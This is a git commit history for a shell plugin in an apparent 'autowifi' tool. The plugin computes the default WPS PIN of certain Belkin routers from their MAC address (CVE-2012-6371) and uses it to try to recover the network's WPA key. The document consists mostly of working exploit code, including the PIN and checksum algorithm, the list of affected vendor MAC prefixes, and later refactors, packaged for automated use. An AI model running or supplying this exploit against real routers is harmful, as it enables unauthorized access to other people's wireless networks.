From 5995257992d9b4d86313e3d78a85b68ffff0a2af Mon Sep 17 00:00:00 2001 From: makefu Date: Sun, 26 May 2013 14:06:53 +0200 Subject: add belkin WPS plugin --- usr/lib/autowifi/plugins/11belkin_wps | 48 +++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100755 usr/lib/autowifi/plugins/11belkin_wps (limited to 'usr/lib/autowifi/plugins/11belkin_wps') diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps new file mode 100755 index 00000000..93dd447a --- /dev/null +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -0,0 +1,48 @@ +#!/bin/sh +# thanks to http://ednolo.alumnos.upv.es/?p=1295G +# for the PoC code +# Calculates the default WPS pin of Belkin Routers and returns the WPA key +# +# Implementation of CVE-2012-6371 + +# works : +# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 +# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 +# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 + +cd $(dirname $(readlink -f $0)) +. ../lib/core +. ../lib/wps +parse_args $@ + +MAC=$(printf "%s" $2| sed 's/://g') +if [ ${#MAC} -ne 12 ] ;then + echo "MAC malformed" + exit 1 +fi +VENDOR_MAC=${MAC:0:6} +PRIVATE_MAC=${MAC:6:12} +if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then + echo "VENDOR MAC $VENDOR_MAC not affected" + exit 1 +fi + +calc_belkin(){ + PRIVATE_MAC=${1} + + p=$((0x$PRIVATE_MAC % 10000000)) + wps_pin_checksum(){ + pin=$1 + accum=0 + while [ $pin -ne 0 ];do + accum=$((accum + (3 * (pin % 10)) )) + pin=$((pin/10)) + accum=$((accum + pin %10 )) + pin=$((pin/10)) + done + echo $(( (10 - accum % 10) % 10)) + } + printf "%07d%d" $p $(wps_pin_checksum $p) + return 0 +} +try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) -- cgit v1.2.3 From 55d6402ac5307af7490a6c6d0607c2b20c68afa4 Mon Sep 17 00:00:00 2001 From: makefu Date: Sun, 26 May 2013 14:09:11 +0200 Subject: update parser --- usr/lib/autowifi/plugins/11belkin_wps | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'usr/lib/autowifi/plugins/11belkin_wps') diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 93dd447a..3820cf2e 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -13,7 +13,7 @@ cd $(dirname $(readlink -f $0)) . ../lib/core . ../lib/wps -parse_args $@ +parse_plugin_args $@ MAC=$(printf "%s" $2| sed 's/://g') if [ ${#MAC} -ne 12 ] ;then -- cgit v1.2.3 From 91b2ec7821796c75bb3a56df951c6734d41a26bb Mon Sep 17 00:00:00 2001 From: makefu Date: Sun, 26 May 2013 14:41:01 +0200 Subject: cleanup and usage for plugins --- usr/lib/autowifi/plugins/11belkin_wps | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) (limited to 'usr/lib/autowifi/plugins/11belkin_wps') diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 3820cf2e..1dba7377 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -11,15 +11,11 @@ # belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 cd $(dirname $(readlink -f $0)) -. ../lib/core +. ../lib/plugin_core . ../lib/wps parse_plugin_args $@ -MAC=$(printf "%s" $2| sed 's/://g') -if [ ${#MAC} -ne 12 ] ;then - echo "MAC malformed" - exit 1 -fi +MAC=$(printf "%s" $MAC| sed 's/://g') VENDOR_MAC=${MAC:0:6} PRIVATE_MAC=${MAC:6:12} if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then -- cgit v1.2.3 From d0e92e7aa1ece7bbccedafbb1730b80c76424f07 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 29 May 2013 20:38:52 +0200 Subject: fix bug in 11belkin_wps whitespace in essid --- usr/lib/autowifi/plugins/11belkin_wps | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) (limited to 'usr/lib/autowifi/plugins/11belkin_wps') diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 1dba7377..82140523 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -13,7 +13,7 @@ cd $(dirname $(readlink -f $0)) . ../lib/plugin_core . ../lib/wps -parse_plugin_args $@ +parse_plugin_args "$@" MAC=$(printf "%s" $MAC| sed 's/://g') VENDOR_MAC=${MAC:0:6} -- cgit v1.2.3 From 11d994c0a822f83b311ce9a63d1f3dc3c29c7039 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:09:44 +0200 Subject: refactor vendor matcher --- usr/lib/autowifi/plugins/11belkin_wps | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) (limited to 'usr/lib/autowifi/plugins/11belkin_wps') diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 82140523..65e08624 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" -MAC=$(printf "%s" $MAC| sed 's/://g') -VENDOR_MAC=${MAC:0:6} -PRIVATE_MAC=${MAC:6:12} -if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then - echo "VENDOR MAC $VENDOR_MAC not affected" - exit 1 -fi + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 calc_belkin(){ PRIVATE_MAC=${1} -- cgit v1.2.3 From 7823e04b4b3f83f1efcc60f11892714b208db96c Mon Sep 17 00:00:00 2001 From: lassulus Date: Fri, 27 Sep 2013 01:00:45 +0200 Subject: implement painmode --- usr/lib/autowifi/plugins/11belkin_wps | 1 + 1 file changed, 1 insertion(+) (limited to 'usr/lib/autowifi/plugins/11belkin_wps') diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 65e08624..d4eb8e37 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -15,6 +15,7 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" +check_painmode ! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 -- cgit v1.2.3